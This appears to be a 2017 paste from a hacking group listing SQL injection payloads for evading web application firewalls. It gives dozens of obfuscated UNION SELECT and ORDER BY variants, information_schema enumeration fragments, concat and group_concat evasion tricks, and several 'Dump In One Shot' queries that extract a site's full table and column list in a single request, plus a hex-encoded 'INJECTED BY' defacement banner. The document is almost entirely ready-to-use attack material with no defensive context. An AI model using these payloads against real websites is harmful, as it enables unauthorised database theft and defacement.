l3mot

SQLi WAF & DIOS (Dump In One Shot)

Mar 31st, 2017
  1.  
  2.  
  3. 0x3c623e3c693e5b2021205d20494e4a454354454420425920415a5a41545353494e53205b2021205d3c2f693e3c2f623e3c62723e3c68723e3c62723e
  4.  
  5.  
  6.  
  7.  
  8. [~]+order+by+[~]
  9.  
  10.  
  11. /**/ORDER/**/BY/**/
  12. /*!order*/+/*!by*/
  13. /*!ORDER+BY*/
  14. /*!50000ORDER+BY*/
  15. /*!50000ORDER*//**//*!50000BY*/
  16. /*!12345ORDER*/+/*!BY*/
  17.  
  18.  
  19.  
  20. [~]+UNION+select+[~]
  21.  
  22.  
  23. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  24. %55nion(%53elect+1,2,3)--+-
  25. +union+distinct+select+
  26. +union+distinctROW+select+
  27. /**//*!12345UNION+SELECT*//**/
  28. /**//*!50000UNION+SELECT*//**/
  29. /**/UNION/**//*!50000SELECT*//**/
  30. /*!50000UniON+SeLeCt*/
  31. union+/*!50000%53elect*/
  32. +#uNiOn+#sEleCt
  33. +#1q%0AuNiOn+all#qa%0A#%0AsEleCt
  34. /*!%55NiOn*/+/*!%53eLEct*/
  35. /*!u%6eion*/+/*!se%6cect*/
  36. +un/**/ion+se/**/lect
  37. uni%0bon+se%0blect
  38. %2f**%2funion%2f**%2fselect
  39. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%
  40. 0A
  41. REVERSE(noinu)+REVERSE(tceles)
  42. /*--*/union/*--*/select/*--*/
  43. union+(/*!/**/+SeleCT+*/+1,2,3)
  44. /*!union*/+/*!select*/
  45. union+/*!select*/
  46. /**/union/**/select/**/
  47. /**/uNIon/**/sEleCt/**/
  48. +%2F**/+Union/*!select*/
  49. /**//*!union*//**//*!select*//**/
  50. /*!uNIOn*/+/*!SelECt*/
  51. +union+distinct+select+
  52. +union+distinctROW+select+
  53. uNiOn+aLl+sElEcT
  54. UNIunionON+SELselectECT
  55. /**/union/*!50000select*//**/
  56. 0%a0union%a0select%09
  57. %0Aunion%0Aselect%0A
  58. %55nion/**/%53elect
  59. uni<on+all=""+sel="">/*!20000%0d%0aunion*/+/*!
  60. 20000%0d%0aSelEct*/
  61. %252f%252a*/UNION%252f%252a+/SELECT%252f%
  62. 252a*/
  63. %0A%09UNION%0CSELECT%10NULL%
  64. /*!union*//*--*//*!all*//*--*//*!select*/
  65. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%
  66. 0A1%+2C2%2C
  67. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  68. +UnIoN/*&a=*/SeLeCT/*&a=*/
  69. union+sel%0bect
  70. +uni*on+sel*ect+
  71. ++#1q%0Aunion+all#qa%0A#%0Aselect
  72. union(select+(1),(2),(3),(4),(5))
  73. UNION(SELECT(column)FROM(table))
  74. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  75. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  76. union(select(1),2,3)
  77. union+(select+1111,2222,3333)
  78. uNioN+(/*!/**/+SeleCT+*/+11)
  79. union+(select+1111,2222,3333)
  80. ++#1q%0AuNiOn+all#qa%0A#%0AsEleCt
  81. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//
  82. *T*/
  83. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%
  84. 53eLEct*/%0A/*nnaa*/
  85. +%23sexsexsex%0AUnIOn%23sexsexs+ex%
  86. 0ASeLecT+
  87. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D
  88. %0A1%+2C2%2C
  89. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  90. +%23blobblobblob%0aUnIOn%23blobblobblob%
  91. 0aSeLe+cT+
  92. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%
  93. 0d%0aSelEct*/
  94. /union\sselect/g
  95. /union\s+select/i
  96. /*!UnIoN*/SeLeCT
  97. +UnIoN/*&a=*/SeLeCT/*&a=*/
  98. +uni>on+sel>ect+
  99. +(UnIoN)+(SelECT)+
  100. +(UnI)(oN)+(SeL)(EcT)
  101. +’UnI”On’+'SeL”ECT’
  102. +uni+on+sel+ect+
  103. +/*!UnIoN*/+/*!SeLeCt*/+
  104. /*!u%6eion*/+/*!se%6cect*/
  105. uni%20union%20/*!select*/%20
  106. union%23aa%0Aselect
  107. /**/union/*!50000select*/
  108. /^.*union.*$/+/^.*select.*$/
  109. /*union*/union/*select*/select+
  110. /*uni+X+on*/union/*sel+X+ect*/
  111. +un/**/ion+sel/**/ect+
  112. +UnIOn%0d%0aSeleCt%0d%0a
  113. UNION/*&test=1*/SELECT/*&pwn=2*/
  114. un?<ion+sel="">+un/**/ion+se/**/lect+
  115. +UNunionION+SEselectLECT+
  116. +uni%0bon+se%0blect+
  117. %252f%252a*/union%252f%252a+/select%252f%
  118. 252a*/
  119. /%2A%2A/union/%2A%2A/select/%2A%2A/
  120. %2f**%2funion%2f**%2fselect%2f**%2f
  121. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%
  122. 0A
  123. /*!UnIoN*/SeLecT+
  124. [~]+information_schema.tables+[~]
  125. /*!froM*/+/*!InfORmaTion_scHema*/.tAblES+/*!
  126. WhERe*/+/*!TaBle_ScHEmA*/=schEMA()--+-
  127. /*!froM*/+/*!InfORmaTion_scHema*/.tAblES+/*!
  128. WhERe*/+/*!TaBle_ScHEmA*/+like+schEMA()--+-
  129. /*!froM*/+/*!InfORmaTion_scHema*/.tAblES+/*!
  130. WhERe*/+/*!TaBle_ScHEmA*/=database()--+-
  131. /*!froM*/+/*!InfORmaTion_scHema*/.tAblES+/*!
  132. WhERe*/+/*!TaBle_ScHEmA*/+like+database()--+-
  133. /*!FrOm*/+%69nformation_schema./**/columns+/*!
  134. 50000Where*/+/*!%54able_name*/=hex+table
  135. /*!FrOm*/+information_schema./**/columns+/*!
  136. 12345Where*/+/*!%54able_name*/+like+hex+table
  137.  
  138.  
  139.  
  140. [~]+concat()+[~]
  141.  
  142.  
  143.  
  144. CoNcAt()
  145. concat()
  146. CON%08CAT()
  147. CoNcAt()
  148. %0AcOnCat()
  149. /**//*!12345cOnCat*/
  150. /*!50000cOnCat*/(/*!*/)
  151. unhex(hex(concat(table_name)))
  152. unhex(hex(/*!12345concat*/(table_name)))
  153. unhex(hex(/*!50000concat*/(table_name)))
  154.  
  155.  
  156. [~]+group_concat()+[~]
  157.  
  158.  
  159. /*!group_concat*/()
  160. gRoUp_cOnCAt()
  161. group_concat(/*!*/)
  162. group_concat(/*!12345table_name*/)
  163. group_concat(/*!50000table_name*/)
  164. /*!group_concat*/(/*!12345table_name*/)
  165. /*!group_concat*/(/*!50000table_name*/)
  166. /*!12345group_concat*/(/*!12345table_name*/)
  167. /*!50000group_concat*/(/*!50000table_name*/)
  168. /*!GrOuP_ConCaT*/()
  169. /*!12345GroUP_ConCat*/()
  170. /*!50000gRouP_cOnCaT*/()
  171. /*!50000Gr%6fuP_c%6fnCAT*/()
  172. unhex(hex(group_concat(table_name)))
  173. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  174. unhex(hex(/*!12345group_concat*/(table_name)))
  175. unhex(hex(/*!12345group_concat*/(/*!table_
  176. name*/)))
  177. unhex(hex(/*!12345group_concat*/(/*!12345table_
  178. name*/)))
  179. unhex(hex(/*!50000group_concat*/(table_name)))
  180. unhex(hex(/*!50000group_concat*/(/*!table_
  181. name*/)))
  182. unhex(hex(/*!50000group_concat*/(/*!50000table_
  183. name*/)))
  184. convert(group_concat(table_name)+using+ascii)
  185. convert(group_concat(/*!table_name*/)+using
  186. +ascii)
  187. convert(group_concat(/*!12345table_name*/)+using
  188. +ascii)
  189. convert(group_concat(/*!50000table_name*/)+using
  190. +ascii)
  191. CONVERT(group_concat(table_name)+USING+latin1)
  192. CONVERT(group_concat(table_name)+USING+latin2)
  193. CONVERT(group_concat(table_name)+USING+latin3)
  194. CONVERT(group_concat(table_name)+USING+latin4)
  195. CONVERT(group_concat(table_name)+USING+latin5)
  196.  
  197.  
  198.  
  199. DIOS+(Dump+In+One+Shot)
  200.  
  201.  
  202. (select(@)from(select(@:=0x00),(select(@)from
  203. (information_schema.columns)where(@)in(@:=concat(@
  204. ,0x3C62723E,table_name,0x3a,column_name))))a)
  205.  
  206. (select(select+concat(@:=0xa7,(select+count(*)from
  207. (information_schema.columns)where(@:=concat(@
  208. ,0x3c6c693e,table_name,0x3a,column_name))),@)))
  209.  
  210. (Select+export_set(5,@:=0,(select+count(*)from
  211. (information_schema.columns)where@:=export_set
  212. (5,export_set(5,@,table_name,0x3c6c693e,2),column_
  213. name,0xa3a,2)),@,2))
  214.  
  215. make_set(6,@:=0x0a,(select(1)from(information_
  216. schema.columns)where@:=make_set(511,@
  217. ,0x3c6c693e,table_name,column_name)),@)
  218.  
  219. (select(@x)from(
  220. select(@x:=0x00),(
  221. select(0)
  222. from(information_
  223. schema.columns)
  224. where(table_schema=
  225. database())and(0x00)
  226. in(@x:=concat
  227. +(@x,0x3c62723e,table_
  228. name,0x203a3a20,column_
  229. name))))x)
  230.  
  231. (select+(@a)+from+(select(@a:=0x00),(@tbl:=0x00),
  232. (@tbl_sc:=0x00),(select+(@a)+from+(information_schema.columns)
  233. where+(table_schema!='information_schema')+and(0x00)in
  234. (@a:=concat(@a,0x3c62723e,if(+(@tbl!=table_name),+Concat
  235. (0x3c62723e,@tbl_sc:=table_schema,'+::
  236. ',@tbl:=table_name,'+(Rows+',(select+table_rows+from
  237. +information_schema.tables+where+table_schema=@tbl_sc+and
  238. +table_name=@tbl),')',column_name),+(column_name))))))a)
  239.  
  257. © AZZATSSINS CYBERSERKERS